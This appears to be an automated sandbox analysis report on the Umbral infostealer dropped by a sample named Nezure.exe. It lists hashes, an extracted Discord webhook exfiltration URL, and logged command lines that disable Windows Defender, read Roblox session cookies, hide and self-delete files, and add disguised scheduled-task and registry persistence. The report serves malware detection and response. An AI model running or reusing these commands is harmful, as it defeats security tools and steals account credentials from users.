Analysis

max time kernel:   52s
max time network:  45s
platform:          windows11-21h2_x64
resource:          win11-20240419-en
resource tags:     arch:x64, arch:x86, image:win11-20240419-en, locale:en-us, os:windows11-21h2-x64, system
submitted:         28-05-2024 21:52

Static task:       static1
Behavioral task:   behavioral1
  Sample:          Nezure.exe
  Resource:        win10v2004-20240508-en
Behavioral task:   behavioral2
  Sample:          Nezure.exe
  Resource:        win11-20240419-en
General

Target:  Nezure.exe
Size:    8.3MB
MD5:     4efce9b6099fa6bfc272b5e192fe16cc
SHA1:    d5495d7d0593a0258bb50325eb0381cec5decd19
SHA256:  185d297d3a204b586f262ce576bc40127b6ea49561b07c7e40c0a2e779df03e1
SHA512:  0b81846c316c3790b1d3fd88953d7c9350443d8dd34cbf4311677e5706b59f4e8b0819186f7cb81b980bab88b9aa6802170536d50a989f081b0aacb68f58ca5f
SSDEEP:  196608:UB4vMWmmF95vrRoypY2xNS+U1kYLLBGJt4qi5Wh4d3J4jtQG0gIe:UevBn5viETxNS+5OBU4hat0gI
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1244715424420069449/GTIFnC19DnPwT_RfLQ395m4ILCbNzqdjl2fE6jLwJomWdfGuqMipwhUem4c7oUOG5y7l
Signatures

Detect Umbral payload  (2 IoCs)
  yara_rule      resource
  family_umbral  behavioral2/memory/1108-34-0x0000023FBA770000-0x0000023FBA7B0000-memory.dmp
  family_umbral  C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Modifies WinLogon for persistence  (2 TTPs, 1 IoC)
  process     description      ioc
  Client.exe  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\Videos\\MicrosoftSecurity.exe"

Command and Scripting Interpreter: PowerShell  (1 TTP, 1 IoC)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths and processes.

Drops file in Drivers directory  (1 IoC)
  process     description                   ioc
  Umbral.exe  File opened for modification  C:\Windows\System32\drivers\etc\hosts

Modifies AppInit DLL entries  (2 TTPs)

Executes dropped EXE  (3 IoCs)
  pid   process
  2084  Nezur.exe
  3284  Client.exe
  1108  Umbral.exe

Loads dropped DLL  (14 IoCs)
  pids: 4580, 1104, 4092, 832, 2388 (WmiApSrv.exe), 3660, 1644, 4204, 4808, 1948, 652, 3060, 4924, 1572
  (the report names only the WmiApSrv.exe process for this signature)

Reads user/profile data of web browsers  (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.

Adds Run key to start application  (2 TTPs, 1 IoC)
  process     description      ioc
  Client.exe  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Chrome.exe"

Legitimate hosting services abused for malware hosting/C2  (1 TTP, 2 IoCs)

Looks up external IP address via web service  (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  1     ip-api.com

Drops file in Windows directory  (1 IoC)
  process     description   ioc
  Client.exe  File created  C:\Windows\xdwd.dll

Enumerates physical storage devices  (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s)  (1 TTP, 12 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   process
  3272  schtasks.exe
  2600  schtasks.exe
  3092  schtasks.exe
  712   schtasks.exe
  2400  schtasks.exe
  1860  schtasks.exe
  4696  schtasks.exe
  1796  schtasks.exe
  1640  schtasks.exe
  1352  schtasks.exe
  1968  schtasks.exe
  780   schtasks.exe

Detects videocard installed  (1 TTP, 1 IoC)
  Uses WMIC.exe to determine the installed video card.

Runs ping.exe  (1 TTP, 1 IoC)
Suspicious behavior: EnumeratesProcesses  (37 IoCs)
  pid   process         events logged
  1108  Umbral.exe      1
  4424  powershell.exe  2
  728   powershell.exe  2
  2600  powershell.exe  2
  4236  powershell.exe  2
  2504  powershell.exe  2
  3284  Client.exe      24
  2388  WmiApSrv.exe    2
Suspicious use of AdjustPrivilegeToken  (64 IoCs)
  pid   process         tokens
  3284  Client.exe      SeDebugPrivilege
  1108  Umbral.exe      SeDebugPrivilege
  2500  wmic.exe        SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
                        SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
                        SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
                        SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege,
                        33, 34, 35, 36  (this sequence is logged twice for pid 2500)
  4424  powershell.exe  SeDebugPrivilege
  728   powershell.exe  SeDebugPrivilege
  2600  powershell.exe  SeDebugPrivilege
  4236  powershell.exe  SeDebugPrivilege
  3488  wmic.exe        SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
                        SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
                        SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
                        SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
Suspicious use of WriteProcessMemory  (64 IoCs; every source/target pair below is logged twice)
  source pid  source process  target pid  target process
  3844        Nezure.exe      2084        Nezur.exe
  3844        Nezure.exe      3284        Client.exe
  3844        Nezure.exe      1108        Umbral.exe
  1108        Umbral.exe      2500        wmic.exe
  1108        Umbral.exe      4628        attrib.exe
  1108        Umbral.exe      4424        powershell.exe
  1108        Umbral.exe      728         powershell.exe
  1108        Umbral.exe      2600        powershell.exe
  1108        Umbral.exe      4236        powershell.exe
  1108        Umbral.exe      3488        wmic.exe
  1108        Umbral.exe      1664        wmic.exe
  1108        Umbral.exe      3956        wmic.exe
  1108        Umbral.exe      2504        powershell.exe
  1108        Umbral.exe      4648        wmic.exe
  1108        Umbral.exe      4636        cmd.exe
  4636        cmd.exe         2068        PING.EXE
  3284        Client.exe      240         CMD.exe
  240         CMD.exe         712         schtasks.exe
  3284        Client.exe      2636        CMD.exe
  2636        CMD.exe         2400        schtasks.exe
  3284        Client.exe      780         CMD.exe
  780         CMD.exe         1860        schtasks.exe
  3284        Client.exe      776         CMD.exe
  776         CMD.exe         4696        schtasks.exe
  3284        Client.exe      4444        CMD.exe
  4444        CMD.exe         1796        schtasks.exe
  3284        Client.exe      2944        CMD.exe
  2944        CMD.exe         3272        schtasks.exe
  3284        Client.exe      3416        CMD.exe
  3416        CMD.exe         2600        schtasks.exe
  3284        Client.exe      2336        CMD.exe
  2336        CMD.exe         3092        schtasks.exe
Uses Task Scheduler COM API  (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes  (1 TTP, 1 IoC)
Processes
(the bracketed number is the process-tree depth given in the report; each entry shows the image path, the command line, and the signatures that fired)

[1] C:\Users\Admin\AppData\Local\Temp\Nezure.exe
    "C:\Users\Admin\AppData\Local\Temp\Nezure.exe"
    - Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\Temp\Nezur.exe
      "C:\Users\Admin\AppData\Local\Temp\Nezur.exe"
      - Executes dropped EXE

  [2] C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      - Modifies WinLogon for persistence
      - Executes dropped EXE
      - Adds Run key to start application
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Ableton Live" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" & exit
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Ableton Live" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe"
          - Creates scheduled task(s)

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          - Creates scheduled task(s)

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Adobe Premiere Pro" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe" /RL HIGHEST & exit
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo 5 /tn "Adobe Premiere Pro" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe" /RL HIGHEST
          - Creates scheduled task(s)

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          - Creates scheduled task(s)

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          - Creates scheduled task(s)

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          - Creates scheduled task(s)

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          - Creates scheduled task(s)

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          - Creates scheduled task(s)

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          - Creates scheduled task(s)

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          - Creates scheduled task(s)

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          - Creates scheduled task(s)

    [3] C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit

      [4] C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          - Creates scheduled task(s)

  [2] C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        - Views/modifies file attributes

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory

    [3] C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        - Suspicious behavior: EnumeratesProcesses

    [3] C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        - Detects videocard installed

    [3] C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\PING.EXE
          ping localhost
          - Runs ping.exe

[1] C:\Windows\system32\wbem\WmiApSrv.exe
    C:\Windows\system32\wbem\WmiApSrv.exe
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix (ATT&CK v13)

Persistence
  Boot or Logon Autostart Execution (3)
    Registry Run Keys / Startup Folder (2)
    Winlogon Helper DLL (1)
  Scheduled Task/Job (1)

Privilege Escalation
  Boot or Logon Autostart Execution (3)
    Registry Run Keys / Startup Folder (2)
    Winlogon Helper DLL (1)
  Scheduled Task/Job (1)
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  (2KB)
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  (1KB)
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  (944B)
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  (948B)
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  (1KB)
C:\Users\Admin\AppData\Local\Temp\Client.exe  (578KB)
C:\Users\Admin\AppData\Local\Temp\Nezur.exe  (7.9MB)
C:\Users\Admin\AppData\Local\Temp\Umbral.exe  (230KB)
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjlebmfj.0m2.ps1  (60B)
C:\Windows\xdwd.dll  (136KB)
memory/1108-64-0x0000023FD5010000-0x0000023FD5060000-memory.dmp  (320KB)
memory/1108-99-0x0000023FD4F30000-0x0000023FD4F3A000-memory.dmp  (40KB)
memory/1108-100-0x0000023FD4F60000-0x0000023FD4F72000-memory.dmp  (72KB)
memory/1108-34-0x0000023FBA770000-0x0000023FBA7B0000-memory.dmp  (256KB)
memory/1108-65-0x0000023FD4F10000-0x0000023FD4F2E000-memory.dmp  (120KB)
memory/1108-63-0x0000023FD4F90000-0x0000023FD5006000-memory.dmp  (472KB)
memory/2084-35-0x00007FF6AE080000-0x00007FF6AF3D9000-memory.dmp  (19.3MB)
memory/3284-38-0x00007FF830B90000-0x00007FF831652000-memory.dmp  (10.8MB)
memory/3284-31-0x0000000000A30000-0x0000000000AC6000-memory.dmp  (600KB)
memory/3284-191-0x0000000002B90000-0x0000000002B9C000-memory.dmp  (48KB)
memory/3284-223-0x00007FF830B90000-0x00007FF831652000-memory.dmp  (10.8MB)
memory/3844-36-0x00007FF830B90000-0x00007FF831652000-memory.dmp  (10.8MB)
memory/3844-0-0x00007FF830B93000-0x00007FF830B95000-memory.dmp  (8KB)
memory/3844-3-0x00007FF830B90000-0x00007FF831652000-memory.dmp  (10.8MB)
memory/3844-1-0x0000000000B00000-0x000000000134C000-memory.dmp  (8.3MB)
memory/4424-39-0x000001B4A4850000-0x000001B4A4872000-memory.dmp  (136KB)